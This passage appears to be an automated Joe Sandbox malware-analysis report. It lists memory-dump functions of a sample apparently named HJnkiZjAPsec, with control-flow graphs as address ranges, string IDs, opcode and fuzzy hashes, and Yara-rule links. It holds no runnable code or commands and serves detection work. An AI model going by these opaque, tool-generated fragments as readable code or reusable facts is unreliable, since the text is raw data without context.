                                                                                                        control_flow_graph 214 29e6fc8-29e6ffe 215 29e7006-29e700c 214->215 349 29e7000 call 29e7118 214->349 350 29e7000 call 29e6fc8 214->350 351 29e7000 call 29e69a0 214->351 216 29e700e-29e7012 215->216 217 29e705c-29e7060 215->217 218 29e7014-29e7019 216->218 219 29e7021-29e7028 216->219 220 29e7077-29e708b 217->220 221 29e7062-29e7071 217->221 218->219 224 29e70fe-29e713b 219->224 225 29e702e-29e7035 219->225 226 29e7093-29e709a 220->226 346 29e708d call 29ea088 220->346 347 29e708d call 29ea0e8 220->347 348 29e708d call 29e9dd0 220->348 222 29e709d-29e70a7 221->222 223 29e7073-29e7075 221->223 227 29e70a9-29e70af 222->227 228 29e70b1-29e70b5 222->228 223->226 236 29e713d-29e7143 224->236 237 29e7146-29e7166 224->237 225->217 229 29e7037-29e703b 225->229 230 29e70bd-29e70f7 227->230 228->230 232 29e70b7 228->232 233 29e703d-29e7042 229->233 234 29e704a-29e7051 229->234 230->224 232->230 233->234 234->224 235 29e7057-29e705a 234->235 235->226 236->237 242 29e716d-29e7174 237->242 243 29e7168 237->243 245 29e7176-29e7181 242->245 246 29e74fc-29e7505 243->246 247 29e750d-29e7519 245->247 248 29e7187-29e719a 245->248 253 29e751b-29e7521 247->253 254 29e74b9 247->254 255 29e719c-29e71aa 248->255 256 29e71b0-29e71cb 248->256 257 29e7523-29e7549 253->257 258 29e74c1-29e74c4 253->258 259 29e74bb-29e74c0 254->259 260 29e7508 254->260 255->256 267 29e7484-29e748b 255->267 271 29e71ef-29e71f2 256->271 272 29e71cd-29e71d3 256->272 268 29e754b-29e7550 257->268 269 29e7552-29e7556 257->269 263 29e74c6-29e74cb 258->263 264 29e74d3-29e74d9 258->264 259->258 261 29e74e2-29e74e4 259->261 260->247 261->260 273 29e74e6-29e74e9 261->273 263->264 264->247 270 29e74db-29e74e0 264->270 267->246 278 29e748d-29e748f 267->278 274 29e755c-29e755d 268->274 269->274 270->261 275 29e74b6 270->275 279 29e734c-29e7352 271->279 280 29e71f8-29e71fb 271->280 276 29e71dc-29e71df 272->276 277 29e71d5 272->277 286 29e74f0-29e74f3 273->286 275->254 282 29e7212-29e7218 276->282 283 29e71e1-29e71e4 276->283 277->276 277->279 281 29e743e-29e7441 277->281 277->282 284 29e749e-29e74a4 278->284 285 29e7491-29e7496 278->285 279->281 287 29e7358-29e735d 279->287 280->279 288 29e7201-29e7207 280->288 281->260 294 29e7447-29e744d 281->294 295 29e721e-29e7220 282->295 296 29e721a-29e721c 282->296 289 29e727e-29e7284 283->289 290 29e71ea 283->290 284->247 292 29e74a6-29e74ab 284->292 285->284 286->260 291 29e74f5-29e74fa 286->291 287->281 288->279 293 29e720d 288->293 289->281 298 29e728a-29e7290 289->298 290->281 291->246 291->278 292->286 297 29e74ad-29e74b2 292->297 293->281 299 29e744f-29e7457 294->299 300 29e7472-29e7476 294->300 301 29e722a-29e7233 295->301 296->301 297->260 306 29e74b4 297->306 307 29e7296-29e7298 298->307 308 29e7292-29e7294 298->308 299->247 302 29e745d-29e746c 299->302 300->267 305 29e7478-29e747e 300->305 303 29e7246-29e726e 301->303 304 29e7235-29e7240 301->304 302->256 302->300 320 29e7274-29e7279 303->320 321 29e7362-29e7398 303->321 304->281 304->303 305->245 305->267 306->259 309 29e72a2-29e72b9 307->309 308->309 314 29e72bb-29e72d4 309->314 315 29e72e4-29e730b 309->315 314->321 325 29e72da-29e72df 314->325 315->260 324 29e7311-29e7314 315->324 320->321 328 29e739a-29e739e 321->328 329 29e73a5-29e73ad 321->329 324->260 327 29e731a-29e7343 324->327 325->321 327->321 344 29e7345-29e734a 327->344 331 29e73bd-29e73c1 328->331 332 29e73a0-29e73a3 328->332 329->260 330 29e73b3-29e73b8 329->330 330->281 334 29e73c3-29e73c9 331->334 335 29e73e0-29e73e4 331->335 332->329 332->331 334->335 336 29e73cb-29e73d3 334->336 337 29e73ee-29e740d call 29e76f1 335->337 338 29e73e6-29e73ec 335->338 336->260 340 29e73d9-29e73de 336->340 341 29e7413-29e7417 337->341 338->337 338->341 340->281 341->281 342 29e7419-29e7435 341->342 342->281 344->321 346->226 347->226 348->226 349->215 350->215 351->215
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                        • API String ID: 0-2525668591
                                                                                                        • Opcode ID: b279d36399467caaa9de9f63b583dd9518e40d917c6ccc204bf19a5713d486e4
                                                                                                        • Instruction ID: 27d75b5b8370146a21ad07ce9d2909f68de1ed2fccc33e1e9c07754a048873a8
                                                                                                        • Opcode Fuzzy Hash: b279d36399467caaa9de9f63b583dd9518e40d917c6ccc204bf19a5713d486e4
                                                                                                        • Instruction Fuzzy Hash: 96123E30A00219DFCF16CFA9D884AEEFBB6BF89304F158465E8569B365DB30D941CB52
                                                                                                        Function 029EC146 Relevance: 6.5, Strings: 5, Instructions: 254COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 463 29ec146-29ec158 464 29ec15a-29ec172 463->464 465 29ec184 463->465 469 29ec17b-29ec17e 464->469 470 29ec174-29ec179 464->470 466 29ec186-29ec18a 465->466 471 29ec18b-29ec199 469->471 472 29ec180-29ec182 469->472 470->466 474 29ec13d-29ec13f 471->474 475 29ec19b-29ec19d 471->475 472->464 472->465 476 29ec141 474->476 475->476 477 29ec19f-29ec1a1 475->477 478 29ec0e5-29ec0fb 476->478 479 29ec143 476->479 480 29ec145 477->480 481 29ec1a3-29ec1c8 477->481 482 29ec0fd-29ec111 478->482 483 29ec131-29ec140 478->483 479->480 484 29ec1cf-29ec2ac call 29e41a0 call 29e3cc0 481->484 485 29ec1ca 481->485 482->483 489 29ec113 482->489 483->480 507 29ec2ae 484->507 508 29ec2b3-29ec2d4 call 29e5658 484->508 485->484 491 29ec118-29ec11b 489->491 493 29ec12c 491->493 494 29ec11d-29ec120 491->494 493->483 496 29ec0cf-29ec0d9 494->496 497 29ec122-29ec129 494->497 496->483 499 29ec0db-29ec0f3 496->499 499->491 505 29ec0f5-29ec0fb 499->505 505->482 505->483 507->508 510 29ec2d9-29ec2e4 508->510 511 29ec2eb-29ec2ef 510->511 512 29ec2e6 510->512 513 29ec2f4-29ec2fb 511->513 514 29ec2f1-29ec2f2 511->514 512->511 516 29ec2fd 513->516 517 29ec302-29ec310 513->517 515 29ec313-29ec357 514->515 521 29ec3bd-29ec3d4 515->521 516->517 517->515 523 29ec359-29ec36f 521->523 524 29ec3d6-29ec3fb 521->524 527 29ec399 523->527 528 29ec371-29ec37d 523->528 532 29ec3fd-29ec412 524->532 533 29ec413-29ec415 524->533 534 29ec39f 527->534 530 29ec37f-29ec385 528->530 531 29ec387-29ec38d 528->531 535 29ec397 530->535 531->535 532->533 536 29ec3a2-29ec3bc 533->536 542 29ec417-29ec45e 533->542 534->536 535->534 536->521
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: be9639aeae2fef8c6bb83cd375e1e84c1eabb152b8818a67be8021e210affa06
                                                                                                        • Instruction ID: 399272f56c13b968f0c818f8934709823c4b0a5bc98af54972d4d20b40788389
                                                                                                        • Opcode Fuzzy Hash: be9639aeae2fef8c6bb83cd375e1e84c1eabb152b8818a67be8021e210affa06
                                                                                                        • Instruction Fuzzy Hash: A8B11775E00258DFDF15CFA9D884A9DBBF2BF89304F1580AAE449AB365DB309881CF50
                                                                                                        Function 029ED278 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 632 29ed278-29ed2a8 633 29ed2af-29ed38c call 29e41a0 call 29e3cc0 632->633 634 29ed2aa 632->634 644 29ed38e 633->644 645 29ed393-29ed3b4 call 29e5658 633->645 634->633 644->645 647 29ed3b9-29ed3c4 645->647 648 29ed3cb-29ed3cf 647->648 649 29ed3c6 647->649 650 29ed3d4-29ed3db 648->650 651 29ed3d1-29ed3d2 648->651 649->648 653 29ed3dd 650->653 654 29ed3e2-29ed3f0 650->654 652 29ed3f3-29ed437 651->652 658 29ed49d-29ed4b4 652->658 653->654 654->652 660 29ed439-29ed44f 658->660 661 29ed4b6-29ed4db 658->661 665 29ed479 660->665 666 29ed451-29ed45d 660->666 668 29ed4dd-29ed4f2 661->668 669 29ed4f3 661->669 667 29ed47f-29ed49c 665->667 670 29ed45f-29ed465 666->670 671 29ed467-29ed46d 666->671 667->658 668->669 672 29ed477 670->672 671->672 672->667
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 4ef038c0199d3686b03745455277e1184cf920e97f58e5a2ab64c2ab81a7cfbd
                                                                                                        • Instruction ID: 65abedf044ebad5644e1269e1510b2c5f70cd4462050f01def3b314a91e74222
                                                                                                        • Opcode Fuzzy Hash: 4ef038c0199d3686b03745455277e1184cf920e97f58e5a2ab64c2ab81a7cfbd
                                                                                                        • Instruction Fuzzy Hash: 1E81A474E00218CFDB19DFAAD984A9DBBF6BF88304F14D069E419AB365DB349985CF10
                                                                                                        Function 029ECA08 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 544 29eca08-29eca38 545 29eca3f-29ecb1c call 29e41a0 call 29e3cc0 544->545 546 29eca3a 544->546 556 29ecb1e 545->556 557 29ecb23-29ecb44 call 29e5658 545->557 546->545 556->557 559 29ecb49-29ecb54 557->559 560 29ecb5b-29ecb5f 559->560 561 29ecb56 559->561 562 29ecb64-29ecb6b 560->562 563 29ecb61-29ecb62 560->563 561->560 565 29ecb6d 562->565 566 29ecb72-29ecb80 562->566 564 29ecb83-29ecbc7 563->564 570 29ecc2d-29ecc44 564->570 565->566 566->564 572 29ecbc9-29ecbdf 570->572 573 29ecc46-29ecc6b 570->573 576 29ecc09 572->576 577 29ecbe1-29ecbed 572->577 579 29ecc6d-29ecc82 573->579 580 29ecc83 573->580 583 29ecc0f-29ecc2c 576->583 581 29ecbef-29ecbf5 577->581 582 29ecbf7-29ecbfd 577->582 579->580 584 29ecc07 581->584 582->584 583->570 584->583
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 56e70399927ca35f26adb1a4017848b24576acfc43d646fe14ea6ec111b2e7d3
                                                                                                        • Instruction ID: 35b607d0ef4da25f64e7080d4553cdc2613e6ab1136ab2915e260c13da39733b
                                                                                                        • Opcode Fuzzy Hash: 56e70399927ca35f26adb1a4017848b24576acfc43d646fe14ea6ec111b2e7d3
                                                                                                        • Instruction Fuzzy Hash: F581C874E00218CFDB19DFA9D944A9DBBF2BF88304F14C46AE459AB365DB309981CF50
                                                                                                        Function 029ECCD8 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 588 29eccd8-29ecd08 589 29ecd0f-29ecdec call 29e41a0 call 29e3cc0 588->589 590 29ecd0a 588->590 600 29ecdee 589->600 601 29ecdf3-29ece14 call 29e5658 589->601 590->589 600->601 603 29ece19-29ece24 601->603 604 29ece2b-29ece2f 603->604 605 29ece26 603->605 606 29ece34-29ece3b 604->606 607 29ece31-29ece32 604->607 605->604 609 29ece3d 606->609 610 29ece42-29ece50 606->610 608 29ece53-29ece97 607->608 614 29ecefd-29ecf14 608->614 609->610 610->608 616 29ece99-29eceaf 614->616 617 29ecf16-29ecf3b 614->617 621 29eced9 616->621 622 29eceb1-29ecebd 616->622 623 29ecf3d-29ecf52 617->623 624 29ecf53 617->624 627 29ecedf-29ecefc 621->627 625 29ecebf-29ecec5 622->625 626 29ecec7-29ececd 622->626 623->624 628 29eced7 625->628 626->628 627->614 628->627
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 59d1977b7d2e8b331c838edd8abf6a5d2dcbc2066a01eb4d07dd74781f6f4801
                                                                                                        • Instruction ID: bdec3d76ae8e5d2db35bc23578a85ae5a61c83090ca302516107c92d25bb6bea
                                                                                                        • Opcode Fuzzy Hash: 59d1977b7d2e8b331c838edd8abf6a5d2dcbc2066a01eb4d07dd74781f6f4801
                                                                                                        • Instruction Fuzzy Hash: 5081D674E00218DFDB19DFA9D984A9DBBF2BF88304F14C06AE459AB365DB309981CF50
                                                                                                        Function 029E5370 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 676 29e5370-29e53a0 677 29e53a7-29e5484 call 29e41a0 call 29e3cc0 676->677 678 29e53a2 676->678 688 29e548b-29e54a9 677->688 689 29e5486 677->689 678->677 719 29e54ac call 29e5658 688->719 720 29e54ac call 29e5649 688->720 689->688 690 29e54b2-29e54bd 691 29e54bf 690->691 692 29e54c4-29e54c8 690->692 691->692 693 29e54cd-29e54d4 692->693 694 29e54ca-29e54cb 692->694 696 29e54db-29e54e9 693->696 697 29e54d6 693->697 695 29e54ec-29e5530 694->695 701 29e5596-29e55ad 695->701 696->695 697->696 703 29e55af-29e55d4 701->703 704 29e5532-29e5548 701->704 710 29e55ec 703->710 711 29e55d6-29e55eb 703->711 708 29e554a-29e5556 704->708 709 29e5572 704->709 712 29e5558-29e555e 708->712 713 29e5560-29e5566 708->713 714 29e5578-29e5595 709->714 711->710 715 29e5570 712->715 713->715 714->701 715->714 719->690 720->690
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 94e2b397551e6277f4e9dc683c95085cc8758c879c42ef643249aaeac25e2d4d
                                                                                                        • Instruction ID: d55fcc65edc6895fb692f452c4f4a73e80472770144c5b18a07399f76c19858e
                                                                                                        • Opcode Fuzzy Hash: 94e2b397551e6277f4e9dc683c95085cc8758c879c42ef643249aaeac25e2d4d
                                                                                                        • Instruction Fuzzy Hash: 1281B674E00218CFDB19DFAAD984A9DBBF2BF88304F15C469E419AB365DB309981CF10
                                                                                                        Function 029EC738 Relevance: 6.4, Strings: 5, Instructions: 182COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 721 29ec738-29ec768 722 29ec76f-29ec84c call 29e41a0 call 29e3cc0 721->722 723 29ec76a 721->723 733 29ec84e 722->733 734 29ec853-29ec874 call 29e5658 722->734 723->722 733->734 736 29ec879-29ec884 734->736 737 29ec88b-29ec88f 736->737 738 29ec886 736->738 739 29ec894-29ec89b 737->739 740 29ec891-29ec892 737->740 738->737 742 29ec89d 739->742 743 29ec8a2-29ec8b0 739->743 741 29ec8b3-29ec8f7 740->741 747 29ec95d-29ec974 741->747 742->743 743->741 749 29ec8f9-29ec90f 747->749 750 29ec976-29ec99b 747->750 754 29ec939 749->754 755 29ec911-29ec91d 749->755 756 29ec99d-29ec9b2 750->756 757 29ec9b3 750->757 760 29ec93f-29ec95c 754->760 758 29ec91f-29ec925 755->758 759 29ec927-29ec92d 755->759 756->757 761 29ec937 758->761 759->761 760->747 761->760
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 31cf9525b74a6687babad14e107e75120face61ee44f5cdca907c7d79bd5a76e
                                                                                                        • Instruction ID: a9ee97a0cabb612ccf6938c566121265ec21efd1ed34221f923a2ecec4f37b44
                                                                                                        • Opcode Fuzzy Hash: 31cf9525b74a6687babad14e107e75120face61ee44f5cdca907c7d79bd5a76e
                                                                                                        • Instruction Fuzzy Hash: C0818474E00218DFDB19DFA9D984A9DBBF2BF88304F14C06AE459AB365DB349981CF50
                                                                                                        Function 029ECFAB Relevance: 6.4, Strings: 5, Instructions: 182COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 765 29ecfab-29ecfd8 766 29ecfdf-29ed0bc call 29e41a0 call 29e3cc0 765->766 767 29ecfda 765->767 777 29ed0be 766->777 778 29ed0c3-29ed0e4 call 29e5658 766->778 767->766 777->778 780 29ed0e9-29ed0f4 778->780 781 29ed0fb-29ed0ff 780->781 782 29ed0f6 780->782 783 29ed104-29ed10b 781->783 784 29ed101-29ed102 781->784 782->781 786 29ed10d 783->786 787 29ed112-29ed120 783->787 785 29ed123-29ed167 784->785 791 29ed1cd-29ed1e4 785->791 786->787 787->785 793 29ed169-29ed17f 791->793 794 29ed1e6-29ed20b 791->794 798 29ed1a9 793->798 799 29ed181-29ed18d 793->799 801 29ed20d-29ed222 794->801 802 29ed223 794->802 800 29ed1af-29ed1cc 798->800 803 29ed18f-29ed195 799->803 804 29ed197-29ed19d 799->804 800->791 801->802 805 29ed1a7 803->805 804->805 805->800
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: c8d481b00649db2de64e62295f688609f929075bb88a03f898ab0a6d896ce0d0
                                                                                                        • Instruction ID: 65e40502fb449388819f3a93a7e7b9fa952dde4d753df60c04ffb4292f49d2d5
                                                                                                        • Opcode Fuzzy Hash: c8d481b00649db2de64e62295f688609f929075bb88a03f898ab0a6d896ce0d0
                                                                                                        • Instruction Fuzzy Hash: 1B81A174E00218DFDB19DFAAD994A9DBBF6BF89304F14C069E419AB365DB309981CF10
                                                                                                        Function 06969328 Relevance: 3.5, APIs: 2, Instructions: 532libraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1444 6969328-6969338 1445 696933f-696934b 1444->1445 1446 696933a 1444->1446 1449 6969352-6969367 1445->1449 1450 696934d 1445->1450 1447 696946b-6969475 1446->1447 1453 696936d-6969378 1449->1453 1454 696947b-69694bb 1449->1454 1450->1447 1457 6969476 1453->1457 1458 696937e-6969385 1453->1458 1472 69694c2-6969577 1454->1472 1457->1454 1459 6969387-696939e 1458->1459 1460 69693b2-69693bd 1458->1460 1471 69693a4-69693a7 1459->1471 1459->1472 1465 69693bf-69693c7 1460->1465 1466 69693ca-69693d4 1460->1466 1465->1466 1473 696945e-6969463 1466->1473 1474 69693da-69693e4 1466->1474 1471->1457 1475 69693ad-69693b0 1471->1475 1501 696957e-6969614 LdrInitializeThunk 1472->1501 1502 6969579 1472->1502 1473->1447 1474->1457 1481 69693ea-6969406 1474->1481 1475->1459 1475->1460 1486 696940a-696940d 1481->1486 1487 6969408 1481->1487 1488 6969414-6969417 1486->1488 1489 696940f-6969412 1486->1489 1487->1447 1491 696941a-6969428 1488->1491 1489->1491 1491->1457 1495 696942a-6969431 1491->1495 1495->1447 1496 6969433-6969439 1495->1496 1496->1457 1498 696943b-6969440 1496->1498 1498->1457 1499 6969442-6969455 1498->1499 1499->1457 1505 6969457-696945a 1499->1505 1504 69696b3-69696b9 1501->1504 1502->1501 1506 69696bf-69696d7 1504->1506 1507 6969619-696962c 1504->1507 1505->1496 1508 696945c 1505->1508 1509 69696eb-69696fe 1506->1509 1510 69696d9-69696e6 1506->1510 1511 6969633-6969684 1507->1511 1512 696962e 1507->1512 1508->1447 1514 6969705-6969721 1509->1514 1515 6969700 1509->1515 1513 6969a81-6969b7e 1510->1513 1528 6969686-6969694 1511->1528 1529 6969697-69696a9 1511->1529 1512->1511 1520 6969b86-6969b90 1513->1520 1521 6969b80-6969b85 1513->1521 1518 6969723 1514->1518 1519 6969728-696974c 1514->1519 1515->1514 1518->1519 1524 6969753-6969785 1519->1524 1525 696974e 1519->1525 1521->1520 1534 6969787 1524->1534 1535 696978c-69697ce 1524->1535 1525->1524 1528->1506 1531 69696b0 1529->1531 1532 69696ab 1529->1532 1531->1504 1532->1531 1534->1535 1537 69697d5-69697de 1535->1537 1538 69697d0 1535->1538 1539 6969a06-6969a0c 1537->1539 1538->1537 1540 6969a12-6969a25 1539->1540 1541 69697e3-6969808 1539->1541 1544 6969a27 1540->1544 1545 6969a2c-6969a47 1540->1545 1542 696980f-6969846 1541->1542 1543 696980a 1541->1543 1553 696984d-696987f 1542->1553 1554 6969848 1542->1554 1543->1542 1544->1545 1546 6969a4e-6969a62 1545->1546 1547 6969a49 1545->1547 1551 6969a64 1546->1551 1552 6969a69-6969a7f LdrInitializeThunk 1546->1552 1547->1546 1551->1552 1552->1513 1556 69698e3-69698f6 1553->1556 1557 6969881-69698a6 1553->1557 1554->1553 1558 69698fd-6969922 1556->1558 1559 69698f8 1556->1559 1560 69698ad-69698db 1557->1560 1561 69698a8 1557->1561 1564 6969924-6969925 1558->1564 1565 6969931-6969969 1558->1565 1559->1558 1560->1556 1561->1560 1564->1540 1566 6969970-69699d1 call 6969328 1565->1566 1567 696996b 1565->1567 1573 69699d3 1566->1573 1574 69699d8-69699fc 1566->1574 1567->1566 1573->1574 1577 6969a03 1574->1577 1578 69699fe 1574->1578 1577->1539 1578->1577
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4146949146.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_6960000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 68db9991c7778ece39c221dbcbd1556deb3fb4554ceae8c3db50e6eb1b52460b
                                                                                                        • Instruction ID: 2f5d7c967e0bd378baad9229621215548ea5d74ac758049d1e2334a74c2da9dd
                                                                                                        • Opcode Fuzzy Hash: 68db9991c7778ece39c221dbcbd1556deb3fb4554ceae8c3db50e6eb1b52460b
                                                                                                        • Instruction Fuzzy Hash: C0223770E00219CFDB54DFA9C984B9DBBB2BF88304F1085A9E419AB395DB349D85CF90
                                                                                                        Function 029EA088 Relevance: 3.4, Strings: 2, Instructions: 893COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$4'^q
                                                                                                        • API String ID: 0-273632683
                                                                                                        • Opcode ID: 04b1e086e6112ffb2290ffd2f498237219e28695ee2e21973fbdb461e9b3b64d
                                                                                                        • Instruction ID: 4243922e1bd9acfe3f197a9cf56c54496bb6c161feff4d63b3e5ef5bec763d85
                                                                                                        • Opcode Fuzzy Hash: 04b1e086e6112ffb2290ffd2f498237219e28695ee2e21973fbdb461e9b3b64d
                                                                                                        • Instruction Fuzzy Hash: 35826C71A00209DFCF16CFA8C584AAEBBF6BF88314F158959E4069B365D731ED91CB60
                                                                                                        Function 029E69A0 Relevance: 3.0, Strings: 2, Instructions: 510COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$Hbq
                                                                                                        • API String ID: 0-662517225
                                                                                                        • Opcode ID: a3431082d196eb25681f30f1ac16937758b2f65012e4c30f02fa686f3ed4901c
                                                                                                        • Instruction ID: 60e79cfe032a91e4f1f55d45feffce9bb901134b943882d43cba63297ee0f8f8
                                                                                                        • Opcode Fuzzy Hash: a3431082d196eb25681f30f1ac16937758b2f65012e4c30f02fa686f3ed4901c
                                                                                                        • Instruction Fuzzy Hash: 73127F70A002198FDB19DF69C894BAEBBFABF88304F148559E4069B395DF30DD46CB90
                                                                                                        Function 029E3E09 Relevance: 2.9, Strings: 2, Instructions: 429COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2717 29e3e09-29e3e25 2718 29e3e2e-29e3e3e 2717->2718 2719 29e3e27-29e3e29 2717->2719 2721 29e3e45-29e3e55 2718->2721 2722 29e3e40 2718->2722 2720 29e40cc-29e40d3 2719->2720 2724 29e3e5b-29e3e69 2721->2724 2725 29e40b3-29e40c1 2721->2725 2722->2720 2728 29e3e6f 2724->2728 2729 29e40d4-29e41ba 2724->2729 2725->2729 2730 29e40c3-29e40c7 call 29e02c8 2725->2730 2728->2729 2731 29e3f9f-29e3fc7 2728->2731 2732 29e3eda-29e3efb 2728->2732 2733 29e4039-29e4065 2728->2733 2734 29e3e76-29e3e88 2728->2734 2735 29e3f72-29e3f9a 2728->2735 2736 29e3eb3-29e3ed5 2728->2736 2737 29e400e-29e4034 2728->2737 2738 29e3f4c-29e3f6d 2728->2738 2739 29e3fcc-29e4009 2728->2739 2740 29e3e8d-29e3eae 2728->2740 2741 29e3f26-29e3f47 2728->2741 2742 29e4067-29e4082 call 29e02d8 2728->2742 2743 29e40a7-29e40b1 2728->2743 2744 29e4084-29e40a5 call 29e28f0 2728->2744 2745 29e3f00-29e3f21 2728->2745 2799 29e41bc 2729->2799 2800 29e41c1-29e42c9 call 29e2278 call 29e2288 call 29e2298 call 29e22a8 call 29e02e4 2729->2800 2730->2720 2731->2720 2732->2720 2733->2720 2734->2720 2735->2720 2736->2720 2737->2720 2738->2720 2739->2720 2740->2720 2741->2720 2742->2720 2743->2720 2744->2720 2745->2720 2799->2800 2818 29e42cf-29e435f 2800->2818
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
